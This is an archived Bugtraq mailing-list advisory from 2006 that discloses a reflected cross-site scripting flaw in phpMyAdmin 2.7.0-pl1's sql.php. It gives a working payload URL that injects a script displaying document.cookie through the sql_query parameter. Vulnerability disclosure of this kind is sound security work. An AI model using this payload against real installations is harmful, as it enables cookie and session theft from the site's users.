[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

phpMyAdmin 2.7.0-pl1

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpMyAdmin 2.7.0-pl1
From: kr4ch@xxxxxx
Date: 12 Apr 2006 18:50:37 -0000

App: phpMyAdmin 2.7.0-pl1
Advistory by: p0w3r
Exploit: 
/phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql_query=[XSS]
Example: 
/phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql_query=SELECT+*+FROM+%60'%3Cscript%3Ealert(document.cookie)%3C/script%3E'%60

Follow-Ups:
- Re: phpMyAdmin 2.7.0-pl1
  - From: Kevin Waterson

Prev by Date: RE: IBM
Next by Date: Re: Jupiter CMS <= 1.1.5 multiple XSS attack vectors.
Previous by thread: Re: QuickBlogger v1.4 Cross-Site Scripting
Next by thread: Re: phpMyAdmin 2.7.0-pl1
Index(es):
- Date
- Thread